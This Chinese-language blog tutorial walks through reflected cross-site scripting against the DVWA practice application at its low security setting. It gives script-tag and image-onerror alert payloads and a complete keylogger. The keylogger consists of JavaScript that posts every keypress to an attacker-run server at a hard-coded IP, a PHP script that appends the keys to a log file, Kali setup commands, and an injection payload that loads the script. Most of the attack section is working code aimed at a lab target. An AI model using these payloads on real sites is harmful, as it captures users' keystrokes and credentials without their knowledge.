反射性XSS攻击 - 蓑衣孤客

本文最后更新于1699天前，其中的信息可能已经有所发展或是发生改变。

反射性XSS攻击

简单的反射型XSS

进入DVWA 并且将等级设置为low

反射性XSS攻击

我们在输入框中输入下面代码并提交

<script>alert('bbskali.cn')</script>

效果如下：

反射性XSS攻击

这样我们可以看到会弹出一个简单的对话框。这就是最简单的xss

xss图片攻击

在刚才的文本框内输入下面代码并提交

<img src=http://p1.so.qhmsg.com/t014e1de0f43d7b2066.jpg onerror=alert('xss')>

效果如下：

反射性XSS攻击

xss键盘记录

我们新建一个Keylogger.js文件

内容如下：

document.onkeypress=function(evt){  
    evt=evt || window.event  
    key=String.fromCharCode(evt.charCode)  
    if(key){  
        var http=new XMLHttpRequest();  
        var param=encodeURI(key);  
        http.open("POST","http://192.168.3.209/keylogger.php",true);  
        http.setRequestHeader("Content-type","application/x-www-form-urlencoded");  
        http.send("key="+param);  
    }  
}

在新建一个keylogger.php文件

内容如下：

<?php 
$key=$_POST['key'];  
$logfile='keylog.txt';  
$fp=fopen($logfile,"a");  
fwrite($fp,$key);  
fclose($fp);  
?>

1,将其中的192.168.3.209改为自己kali 的ip地址

2,将这两个文件复制到kali的 /var/www/html目录下

3,执行命令

service apache2 start

4,在/var/www/html目录下新建一个keylog.txt文件

给予文件权限

chmod 777 keylog.txt

效果如下：

反射性XSS攻击

5，在xss文本框中输入内容

<script src="http://192.168.3.209/Keylogger.js"></script> 
将ip地址改为自己kali的ip

反射性XSS攻击

提交后在网站中输入任意内容，在kali中就可以看到

反射性XSS攻击

好了本节课简单的反射型XSS就讲到这里，下节课我们接着来看看储存型的xss攻击！

更多教程扫描关注吧

反射性XSS攻击

点击阅读原文快速访问论坛

论坛地址:bbskali.cn

本文来源于互联网:反射性XSS攻击

点击数：57

发送评论编辑评论

发送评论 编辑评论

推荐文章

发送评论编辑评论